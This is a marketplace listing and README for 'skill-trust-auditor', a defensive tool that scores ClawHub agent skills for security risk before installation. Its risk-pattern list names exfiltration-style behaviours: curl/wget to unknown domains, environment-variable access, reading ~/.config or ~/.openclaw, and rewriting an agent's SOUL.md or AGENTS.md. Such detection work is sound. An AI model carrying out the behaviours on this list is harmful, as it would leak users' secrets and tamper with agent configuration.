skill-trust-auditor
--- name: skill-trust-auditor description: "Audit a ClawHub skill for security risks BEFORE installation." version: "1.1.3" metadata: { "openclaw": { "emoji": "🛡️", "requires":
Description
name: skill-trust-auditor description: "Audit a ClawHub skill for security risks BEFORE installation." version: "1.1.3" metadata: { "openclaw": { "emoji": "🛡️", "requires": { "bins": ["python3"], "anyBins": ["clawhub"] } } }
Skill Trust Auditor
Audit any ClawHub skill for security risks before installation.
🛠️ Installation
1. Ask OpenClaw (Recommended)
Tell OpenClaw: "Install the skill-trust-auditor skill." The agent will handle the installation and configuration automatically.
2. Manual Installation (CLI)
If you prefer the terminal, run:
clawhub install skill-trust-auditor
Setup (first run only)
bash scripts/setup.sh
Audit a Skill
When user says "audit [skill-name]" or "is [skill-name] safe" or before any clawhub install:
bash scripts/audit.sh [skill-name-or-url]
# Example:
bash scripts/audit.sh steipete/clawhub
bash scripts/audit.sh https://clawhub.ai/someuser/someskill
Output:
{
"skill": "someuser/someskill",
"trust_score": 72,
"verdict": "INSTALL WITH CAUTION",
"risks": [
{"level": "HIGH", "pattern": "curl to external domain", "location": "scripts/sync.sh:14"},
{"level": "MEDIUM", "pattern": "reads MEMORY.md", "location": "SKILL.md:23"}
],
"safe_patterns": ["no env var access", "no self-modification"],
"author_verified": false,
"recommendation": "Review scripts/sync.sh:14 before installing. The external curl call could exfiltrate data."
}
Post to user with clear summary:
🛡️ Trust Audit: someuser/someskill
Score: 72/100 — ⚠️ INSTALL WITH CAUTION
🔴 HIGH: curl to unknown domain in scripts/sync.sh:14
🟡 MEDIUM: reads your MEMORY.md
Recommendation: Inspect line 14 of sync.sh before proceeding.
Run: clawhub show someuser/someskill --file scripts/sync.sh
Trust Score Guide
| Score | Verdict | Action |
|---|---|---|
| 90-100 | ✅ SAFE | Install freely |
| 70-89 | ⚠️ CAUTION | Review flagged items first |
| 50-69 | 🟠 RISKY | Only if you understand the risks |
| 0-49 | 🔴 DO NOT INSTALL | High probability of malicious intent |
Risk Pattern Reference
HIGH RISK (-30 each):
process.envaccess in scriptscurl/wgetto non-standard domains- Reading
~/.configor~/.openclawdirectly exec()with user-controlled input- Instructions to modify
SOUL.md/AGENTS.md/openclaw.json
MEDIUM RISK (-10 each):
- Any outbound API calls (even to known services)
- File writes outside workspace
- Reading
MEMORY.mdor diary files
LOW RISK (-3 each):
web_fetchto standard domains- Read-only file access in workspace
Auto-Audit Mode
Optionally prepend audit to every install:
# Add to your shell aliases:
alias clawhub-safe='bash ~/.openclaw/workspace/skills/skill-trust-auditor/scripts/audit.sh $1 && clawhub install $1'
ClawHavoc Pattern Reference
See references/clawhavoc-patterns.md for known malicious patterns from the February 2026 incident. Update this file when new incidents are reported.
Reviews (0)
No reviews yet. Be the first to review!
Comments (0)
No comments yet. Be the first to share your thoughts!